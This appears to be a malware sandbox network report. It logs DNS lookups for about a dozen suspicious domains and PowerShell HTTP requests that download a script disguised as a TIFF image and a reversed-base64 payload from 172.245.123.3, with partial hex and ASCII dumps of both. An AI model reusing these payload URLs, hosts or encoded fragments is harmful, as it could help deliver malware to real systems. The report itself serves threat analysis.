                                                                                                                                                        Dec 5, 2024 05:41:26.473776102 CET5002980192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:26.483891010 CET5002980192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:26.603634119 CET8050029199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:27.989483118 CET5002980192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:28.154656887 CET8050029199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:29.010427952 CET5003080192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:29.130523920 CET8050030199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:29.138422966 CET5003080192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:29.146425962 CET5003080192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:29.266205072 CET8050030199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:29.266237020 CET8050030199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:30.645739079 CET5003080192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:30.806844950 CET8050030199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:31.666450977 CET5003180192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:31.786372900 CET8050031199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:31.786497116 CET5003180192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:31.793647051 CET5003180192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:31.913444996 CET8050031199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:45.720489025 CET8050028199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:45.722582102 CET5002880192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:48.408107996 CET8050029199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:48.408160925 CET5002980192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:51.049432039 CET8050030199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:51.050595045 CET5003080192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:53.689343929 CET8050031199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:53.689481020 CET5003180192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:53.690500975 CET5003180192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:53.810121059 CET8050031199.115.230.222192.168.2.6
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 5, 2024 05:38:04.524044037 CET4986053192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:38:50.890480995 CET5990653192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:38:51.511564016 CET53599061.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:08.916436911 CET5310253192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:39:09.502908945 CET53531021.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:23.738022089 CET5676153192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:39:24.236234903 CET53567611.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:38.445983887 CET5519353192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:39:38.758059978 CET53551931.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:53.461961985 CET5155553192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:39:54.072474003 CET53515551.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:08.289598942 CET5700053192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:40:08.781251907 CET53570001.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:23.384474039 CET5637453192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:40:23.865761995 CET53563741.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:38.274142981 CET5706153192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:40:38.760780096 CET53570611.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:52.966259003 CET6290353192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:40:53.559170961 CET53629031.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:07.777548075 CET5961453192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:41:08.648309946 CET53596141.1.1.1192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:23.290400982 CET5776853192.168.2.61.1.1.1
                                                                                                                                                        Dec 5, 2024 05:41:23.692137003 CET53577681.1.1.1192.168.2.6
                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Dec 5, 2024 05:38:04.524044037 CET192.168.2.61.1.1.10xc089Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:38:50.890480995 CET192.168.2.61.1.1.10xf2e7Standard query (0)www.inastra.onlineA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:08.916436911 CET192.168.2.61.1.1.10xcfb5Standard query (0)www.ortenckt.onlineA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:23.738022089 CET192.168.2.61.1.1.10x2fbcStandard query (0)www.ks1x7i.vipA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:38.445983887 CET192.168.2.61.1.1.10x8dc6Standard query (0)www.aaavvejibej.bondA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:53.461961985 CET192.168.2.61.1.1.10x1048Standard query (0)www.deikamalaharris.infoA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:08.289598942 CET192.168.2.61.1.1.10x30b4Standard query (0)www.tophcom.onlineA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:23.384474039 CET192.168.2.61.1.1.10x18c3Standard query (0)www.chalet-tofane.netA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:38.274142981 CET192.168.2.61.1.1.10x5e4aStandard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:52.966259003 CET192.168.2.61.1.1.10x5ef8Standard query (0)www.asiapartnars.onlineA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:41:07.777548075 CET192.168.2.61.1.1.10xd4Standard query (0)www.yu12345.xyzA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:41:23.290400982 CET192.168.2.61.1.1.10xf034Standard query (0)www.qmmkl.buzzA (IP address)IN (0x0001)false
                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Dec 5, 2024 05:38:04.661436081 CET1.1.1.1192.168.2.60xc089No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:38:51.511564016 CET1.1.1.1192.168.2.60xf2e7No error (0)www.inastra.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:09.502908945 CET1.1.1.1192.168.2.60xcfb5No error (0)www.ortenckt.onlineortenckt.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:09.502908945 CET1.1.1.1192.168.2.60xcfb5No error (0)ortenckt.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:09.502908945 CET1.1.1.1192.168.2.60xcfb5No error (0)ortenckt.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:24.236234903 CET1.1.1.1192.168.2.60x2fbcNo error (0)www.ks1x7i.vipks1x7i.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:24.236234903 CET1.1.1.1192.168.2.60x2fbcNo error (0)ks1x7i.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:24.236234903 CET1.1.1.1192.168.2.60x2fbcNo error (0)ks1x7i.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:38.758059978 CET1.1.1.1192.168.2.60x8dc6No error (0)www.aaavvejibej.bond104.21.31.249A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:38.758059978 CET1.1.1.1192.168.2.60x8dc6No error (0)www.aaavvejibej.bond172.67.181.150A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:54.072474003 CET1.1.1.1192.168.2.60x1048No error (0)www.deikamalaharris.infodeikamalaharris.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:54.072474003 CET1.1.1.1192.168.2.60x1048No error (0)deikamalaharris.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:39:54.072474003 CET1.1.1.1192.168.2.60x1048No error (0)deikamalaharris.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:08.781251907 CET1.1.1.1192.168.2.60x30b4No error (0)www.tophcom.online162.213.249.216A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:23.865761995 CET1.1.1.1192.168.2.60x18c3No error (0)www.chalet-tofane.netchalet-tofane.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:23.865761995 CET1.1.1.1192.168.2.60x18c3No error (0)chalet-tofane.net62.149.128.40A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:38.760780096 CET1.1.1.1192.168.2.60x5e4aNo error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:38.760780096 CET1.1.1.1192.168.2.60x5e4aNo error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:38.760780096 CET1.1.1.1192.168.2.60x5e4aNo error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:53.559170961 CET1.1.1.1192.168.2.60x5ef8No error (0)www.asiapartnars.onlineasiapartnars.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:53.559170961 CET1.1.1.1192.168.2.60x5ef8No error (0)asiapartnars.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:40:53.559170961 CET1.1.1.1192.168.2.60x5ef8No error (0)asiapartnars.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:41:08.648309946 CET1.1.1.1192.168.2.60xd4No error (0)www.yu12345.xyzwmnfkj.a.1112dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:41:08.648309946 CET1.1.1.1192.168.2.60xd4No error (0)wmnfkj.a.1112dns.com154.82.100.177A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:41:08.648309946 CET1.1.1.1192.168.2.60xd4No error (0)wmnfkj.a.1112dns.com154.82.100.162A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 5, 2024 05:41:23.692137003 CET1.1.1.1192.168.2.60xf034No error (0)www.qmmkl.buzz199.115.230.222A (IP address)IN (0x0001)false
                                                                                                                                                        • 172.245.123.3
                                                                                                                                                        • www.inastra.online
                                                                                                                                                        • www.ortenckt.online
                                                                                                                                                        • www.ks1x7i.vip
                                                                                                                                                        • www.aaavvejibej.bond
                                                                                                                                                        • www.deikamalaharris.info
                                                                                                                                                        • www.tophcom.online
                                                                                                                                                        • www.chalet-tofane.net
                                                                                                                                                        • www.healthyloveforall.net
                                                                                                                                                        • www.asiapartnars.online
                                                                                                                                                        • www.yu12345.xyz
                                                                                                                                                        • www.qmmkl.buzz
                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.649707172.245.123.3802872C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:37:57.662452936 CET325OUTGET /784/verygreattrafficwithniceworkingskilltobegood.tIF HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: 172.245.123.3
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 5, 2024 05:37:58.770580053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:37:58 GMT
                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 15:38:39 GMT
                                                                                                                                                        ETag: "25a0a-6285f758c139f"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 154122
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: image/tiff
                                                                                                                                                        Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 42 00 62 00 71 00 4c 00 4c 00 47 00 6d 00 4c 00 57 00 51 00 61 00 4f 00 47 00 4a 00 4b 00 20 00 3d 00 20 00 22 00 41 00 4e 00 4f 00 4a 00 69 00 63 00 55 00 47 00 4c 00 6b 00 5a 00 4c 00 47 00 74 00 65 00 22 00 0d 00 0a 00 68 00 4c 00 7a 00 4b 00 63 00 63 00 50 00 67 00 4e 00 5a 00 69 00 71 00 64 00 6c 00 4f 00 20 00 3d 00 20 00 22 00 5a 00 49 00 74 00 7a 00 4a 00 57 00 75 00 4b 00 4c 00 63 00 42 00 6d 00 41 00 4c 00 55 00 22 00 0d 00 0a 00 4f 00 62 00 73 00 4c 00 47 00 68 00 75 00 4b 00 63 00 71 00 7a 00 6b 00 69 00 75 00 4c 00 20 00 3d 00 20 00 22 00 69 00 57 00 6c 00 57 00 6d 00 47 00 7a 00 72 00 63 00 72 00 73 00 6b 00 65 00 6f 00 55 00 22 00 0d 00 0a 00 0d 00 0a 00 49 00 63 00 68 00 4c 00 70 00 4e 00 50 00 6b 00 4c 00 63 00 69 00 48 00 73 00 50 00 4c 00 20 00 3d 00 20 00 22 00 68 00 74 00 47 00 74 00 75 00 57 00 6a 00 7a 00 64 00 64 00 47 00 53 00 69 00 54 00 68 00 22 00 0d 00 0a 00 6f 00 6f 00 43 00 57 00 55 00 4c 00 6b 00 41 00 6b 00 62 00 [TRUNCATED]
                                                                                                                                                        Data Ascii: BbqLLGmLWQaOGJK = "ANOJicUGLkZLGte"hLzKccPgNZiqdlO = "ZItzJWuKLcBmALU"ObsLGhuKcqzkiuL = "iWlWmGzrcrskeoU"IchLpNPkLciHsPL = "htGtuWjzddGSiTh"ooCWULkAkbPcpJK = "LpmCzrumLCWBUGi"exRoWQcBzAeWNBL = "KiBJeLxxLWvWLqq"LeHKcLHkzhhReho = "lWNgeuttWzKzoLk"iikPenciGNnjage = "WRqmkzURiKxfeKB"LAdsLkZzzrqLGaN = "RbcNZiLuzPvcfAK"enWLLKpnsLhcixG = "LOWpqnppkCiQqWZ"PccnuWUkGLaLZLd = "bpikGWiiLikWaeU"NCPCxLWUBLRJxvc = "OLWbpbrRhSGUPRA"WNdCKq
                                                                                                                                                        Dec 5, 2024 05:37:58.770606041 CET224INData Raw: 00 63 00 4c 00 5a 00 64 00 4c 00 4e 00 68 00 70 00 49 00 20 00 3d 00 20 00 22 00 62 00 6c 00 74 00 65 00 4b 00 6e 00 52 00 41 00 42 00 57 00 69 00 6d 00 51 00 6e 00 4c 00 22 00 0d 00 0a 00 57 00 78 00 55 00 4a 00 69 00 69 00 65 00 63 00 55 00 51
                                                                                                                                                        Data Ascii: cLZdLNhpI = "blteKnRABWimQnL"WxUJiiecUQaRWoq = "pJLAucKsGaeRalk"kBcnJNloRoWgROk = "UpzcqnmKmhWrNPL"ckboL
                                                                                                                                                        Dec 5, 2024 05:37:58.770617008 CET1236INData Raw: 00 50 00 57 00 57 00 47 00 6b 00 4c 00 64 00 4c 00 4c 00 69 00 20 00 3d 00 20 00 22 00 62 00 65 00 4a 00 42 00 66 00 55 00 57 00 42 00 57 00 69 00 5a 00 70 00 57 00 69 00 4b 00 22 00 0d 00 0a 00 69 00 4e 00 4c 00 6f 00 64 00 66 00 63 00 74 00 65
                                                                                                                                                        Data Ascii: PWWGkLdLLi = "beJBfUWBWiZpWiK"iNLodfcteLioPLk = "WKeGLWKdmPWsaWu"TzWULiUqKmITmun = "UxSkBpWPpkkeepb"uzbpzWURekRmfLu
                                                                                                                                                        Dec 5, 2024 05:37:58.770658970 CET1236INData Raw: 00 4c 00 62 00 6b 00 4b 00 57 00 22 00 0d 00 0a 00 68 00 73 00 57 00 4b 00 4a 00 48 00 72 00 66 00 70 00 70 00 6e 00 47 00 64 00 48 00 68 00 20 00 3d 00 20 00 22 00 55 00 71 00 7a 00 70 00 57 00 68 00 63 00 7a 00 4c 00 41 00 4b 00 6b 00 50 00 66
                                                                                                                                                        Data Ascii: LbkKW"hsWKJHrfppnGdHh = "UqzpWhczLAKkPfj"keBfqGLKkdsWGcp = "bpUtKiKGhLLmbNf"WgWtcLPGieKIUbp = "TcacpGbAiKmSzLP"
                                                                                                                                                        Dec 5, 2024 05:37:58.770687103 CET1236INData Raw: 00 4b 00 20 00 3d 00 20 00 22 00 7a 00 4c 00 53 00 66 00 5a 00 57 00 68 00 55 00 6f 00 61 00 4e 00 57 00 66 00 76 00 50 00 22 00 0d 00 0a 00 63 00 63 00 65 00 4c 00 78 00 57 00 57 00 7a 00 57 00 62 00 69 00 47 00 55 00 50 00 69 00 20 00 3d 00 20
                                                                                                                                                        Data Ascii: K = "zLSfZWhUoaNWfvP"cceLxWWzWbiGUPi = "oLKZRPGlqfeWhgk"LLmJooGNqLLlilk = "AckZQQWLcWCWQae"zAhNrlCsvibbupm = "eapcU
                                                                                                                                                        Dec 5, 2024 05:37:58.770852089 CET1236INData Raw: 00 0a 00 47 00 67 00 7a 00 54 00 66 00 62 00 6e 00 68 00 6b 00 65 00 65 00 6a 00 6e 00 70 00 4e 00 20 00 3d 00 20 00 22 00 57 00 62 00 52 00 62 00 4b 00 63 00 7a 00 78 00 42 00 52 00 63 00 63 00 6b 00 41 00 55 00 22 00 0d 00 0a 00 42 00 50 00 6b
                                                                                                                                                        Data Ascii: GgzTfbnhkeejnpN = "WbRbKczxBRcckAU"BPkkGkxACZsOKlB = "xZmGeLiZZKGjidh"JHdCrznWBBPeLAL = "ceLZWKzihNGIPHU"iZncLNWJf
                                                                                                                                                        Dec 5, 2024 05:37:58.770863056 CET1236INData Raw: 00 68 00 61 00 55 00 50 00 55 00 57 00 6d 00 78 00 69 00 70 00 4c 00 22 00 0d 00 0a 00 70 00 78 00 43 00 7a 00 64 00 4e 00 78 00 4f 00 67 00 43 00 6b 00 6c 00 6b 00 74 00 63 00 20 00 3d 00 20 00 22 00 43 00 6b 00 63 00 6c 00 47 00 6c 00 69 00 4c
                                                                                                                                                        Data Ascii: haUPUWmxipL"pxCzdNxOgCklktc = "CkclGliLnCLKNUp"UPoBLNLhWeBpWLs = "nbLULWzKibbxsQv"kaKUvHpLhqLBzgP = "ioWLRfoduoZW
                                                                                                                                                        Dec 5, 2024 05:37:58.770875931 CET1236INData Raw: 00 6b 00 62 00 75 00 73 00 63 00 70 00 52 00 20 00 3d 00 20 00 22 00 69 00 6f 00 57 00 54 00 64 00 65 00 41 00 7a 00 6b 00 53 00 50 00 71 00 64 00 69 00 4e 00 22 00 0d 00 0a 00 69 00 74 00 47 00 4e 00 70 00 57 00 6b 00 74 00 75 00 62 00 63 00 42
                                                                                                                                                        Data Ascii: kbuscpR = "ioWTdeAzkSPqdiN"itGNpWktubcBPBj = "itABOWfPoitmkBP"qmbkbKlnkUKHieL = "rjafppWtWgWSvxZ"WInLSaWLWiopWiZ =
                                                                                                                                                        Dec 5, 2024 05:37:58.770890951 CET1236INData Raw: 00 51 00 69 00 57 00 6c 00 22 00 0d 00 0a 00 6d 00 6a 00 6a 00 70 00 55 00 68 00 73 00 69 00 7a 00 55 00 6e 00 73 00 69 00 4c 00 4e 00 20 00 3d 00 20 00 22 00 70 00 4e 00 47 00 69 00 69 00 78 00 4c 00 55 00 75 00 6b 00 68 00 62 00 64 00 70 00 4f
                                                                                                                                                        Data Ascii: QiWl"mjjpUhsizUnsiLN = "pNGiixLUukhbdpO"PUUiimcWBOkiejR = "WeLdiGZJLWWPSpI"GqimpKhcGuWxLGR = "imKAmCecoeKzLZp"fqQ
                                                                                                                                                        Dec 5, 2024 05:37:58.770909071 CET1236INData Raw: 00 20 00 22 00 52 00 4f 00 50 00 52 00 41 00 42 00 71 00 6b 00 63 00 63 00 6e 00 6e 00 63 00 69 00 43 00 22 00 0d 00 0a 00 63 00 47 00 66 00 57 00 4c 00 55 00 48 00 69 00 64 00 78 00 75 00 63 00 42 00 64 00 4c 00 20 00 3d 00 20 00 22 00 75 00 50
                                                                                                                                                        Data Ascii: "ROPRABqkccnnciC"cGfWLUHidxucBdL = "uPPWLGfaRsmpzci"xoUjZjkoLKZGLqf = "NQctkcoWoKNvWcN"aRkKgkiUWLKCUGk = "LkULzd
                                                                                                                                                        Dec 5, 2024 05:37:58.890455961 CET1236INData Raw: 00 4b 00 6b 00 4c 00 57 00 69 00 69 00 74 00 66 00 63 00 63 00 7a 00 54 00 4c 00 20 00 3d 00 20 00 22 00 6e 00 41 00 72 00 72 00 6b 00 5a 00 6f 00 43 00 73 00 6d 00 55 00 57 00 6d 00 55 00 6b 00 22 00 0d 00 0a 00 48 00 4f 00 4c 00 55 00 63 00 64
                                                                                                                                                        Data Ascii: KkLWiitfcczTL = "nArrkZoCsmUWmUk"HOLUcdSaGAOGZKi = "elWWAAoANxLiLtt"WGjUBtWGUcKUKWq = "jGNmmHAiITWcPnQ"KBjLOobbPGNk


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.649759172.245.123.3805988C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:38:26.956653118 CET78OUTGET /784/CAMRRAM.txt HTTP/1.1
                                                                                                                                                        Host: 172.245.123.3
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Dec 5, 2024 05:38:28.068022966 CET1236INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:38:27 GMT
                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 15:32:21 GMT
                                                                                                                                                        ETag: "5d2ac-6285f5f04ae50"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 381612
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                        Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                        Dec 5, 2024 05:38:28.068080902 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw9o1WUZZwrem9Ihay0ZomQEtfwy8CpXHAOw2sfcYA8mF7RbMUVEugVfS+7voapW9MxR4X8xr36ofgq/vX2dC2uqwNbpBMTdELP34pvnqN9S3n4a6tklylFFe7k
                                                                                                                                                        Dec 5, 2024 05:38:28.068094969 CET1236INData Raw: 36 6b 68 33 53 52 59 2b 64 42 38 4f 42 4c 68 47 72 56 6d 73 72 6c 59 50 58 6d 71 36 4b 74 64 79 59 6c 63 68 57 70 53 49 43 69 4a 35 79 59 59 4d 52 75 67 6b 36 7a 76 6d 49 5a 56 2f 51 69 30 49 76 69 6d 66 66 65 31 58 63 47 6b 47 37 6f 76 63 2f 37
                                                                                                                                                        Data Ascii: 6kh3SRY+dB8OBLhGrVmsrlYPXmq6KtdyYlchWpSICiJ5yYYMRugk6zvmIZV/Qi0Ivimffe1XcGkG7ovc/7JJiaSbdzn8M9QwHcuDRs+CHjmsOSiB3OWlG17EFxw6KsRaOU93EQem/PgSWnRF5Kvcc5qOnhfzkgdW9fF2ar6X3/OzZ73AiVUEGpD9VXecdeiD1+yJTd7Em+xks+qxlWoZgCByKHE3msMoOSmriQOUXCy+43THXVj
                                                                                                                                                        Dec 5, 2024 05:38:28.068180084 CET1236INData Raw: 63 56 66 77 2f 55 4a 6a 31 44 6b 39 37 78 6d 72 33 47 30 68 48 47 4f 47 79 37 77 4b 6a 4c 6e 58 53 4f 4b 56 43 77 6c 70 2f 53 70 7a 45 4e 6e 76 75 7a 4e 36 2b 65 74 4b 45 68 56 45 30 71 6d 6c 42 6a 6f 76 45 52 4b 50 76 43 52 54 50 63 32 45 4b 73
